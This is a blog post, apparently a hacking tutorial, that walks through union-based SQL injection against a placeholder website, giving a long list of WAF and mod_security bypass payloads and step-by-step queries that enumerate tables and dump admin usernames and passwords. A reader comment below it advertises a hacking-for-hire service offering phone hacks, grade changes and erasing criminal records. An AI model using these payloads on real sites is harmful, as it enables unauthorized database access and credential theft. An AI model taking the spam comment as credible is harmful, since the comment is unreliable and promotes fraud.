FB

Powered by Jasper Roberts - Blog

Friday 22 May 2015

Union based Sql with WAF Bypass


  • Union based SQL injection + WAF Bypassing By
    Syedmohd


Today i m Going To Discuss About Union based SQL
injection And WAF Bypassing Techniques.
Lets Start Injecting.

Here Is Our Target .
http://www.targetsite.com/news.php?id=11

Add Single Quote (') at the End Of The URL .

http://www.targetsite.com/news.php?id=11'

And Get MYSQL Error.
Lets Balance Our Query for Further Injecting.
Some Comments from our Previous Tutorials.

http://www.targetsite.com/news.php?id=11--

http://www.targetsite.com/news.php?id=11--+

http://www.targetsite.com/news.php?id=11-- -

http://www.targetsite.com/news.php?id=11%23

http://www.targetsite.com/news.php?id=11;

Here Is A Small Explanation on Balance and Comment
in our Injection.
After Balancing Our Query . Next is Count Total Number
Of Columns

http://www.targetsite.com/news.php?id=11 order by
1--+
No Error !

http://www.targetsite.com/news.php?id=11 order by
3--+
No Error!

http://www.targetsite.com/news.php?id=11 order by
5--+
Again No Error !

http://www.targetsite.com/news.php?id=11 order by
6--+

Here We Get Error !
Unknown column '6' in 'order clause'
Now Try To Find Our Vulnerable Columns.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,3,4,5--+

If Our Target site Is Protected with WAF . WAF Will
Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.


/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#
%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect
%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+

Just Change The Union Select With Following Bypass
URLs.
Lets Continue Our Tutorial.

Now Check The Vulnerable Columns.we Use ( - ) for
Finding Vulnerable columns.
We Can Also Check Vulnerable Columns with Other
methods instead of Just Using (-).

Here Are Some Vulnerable Columns Checking Methods
With Examples.

Using And 0
http://www.targetsite.com/news.php?id=11 and 0
Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false
Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0
Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union
Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union
Select 1,2,3,4,5--+

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,3,4,5--+

We Will Get Our Vulnerable Columns Printed On The
Page.3 is Our Vulnerable Column.
Here Are Some Variables Of MYSQL.
@@version = Current Version
@@GLOBALVERSION = Current Version
User() = Current User
Database = Current Database

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,@@version,4,5--+

We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(table_name),4,5 from
information_schema.tables where
table_schema=database()--+

We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target
Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get
The Columns in the Admin Table.Change table_name to
column_name,information_schema.tables to
information_schema.columns and Table_schema to
Table_name.And Replace Database() with our MYSQL
Char() admin value.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(column_name),4,5 from
information_schema.columns where table_name=CHAR
(97, 100, 109, 105, 110)--+

we can see the Column Names on Page . like
id,username,pass
to Get The Data From columns here is our final Query.

http://www.targetsite.com/news.php?id=-11 Union
Select 1,2,concat(username,0x3a,password),4,5 from
admin--+

Author: Syedmohd
Posted by at  No com
Posted by at

1 comment:

  1. jane holly25 November 2020 at 02:02

    This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change
    -funds recovery

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete

Subscribe to: Post Comments (Atom)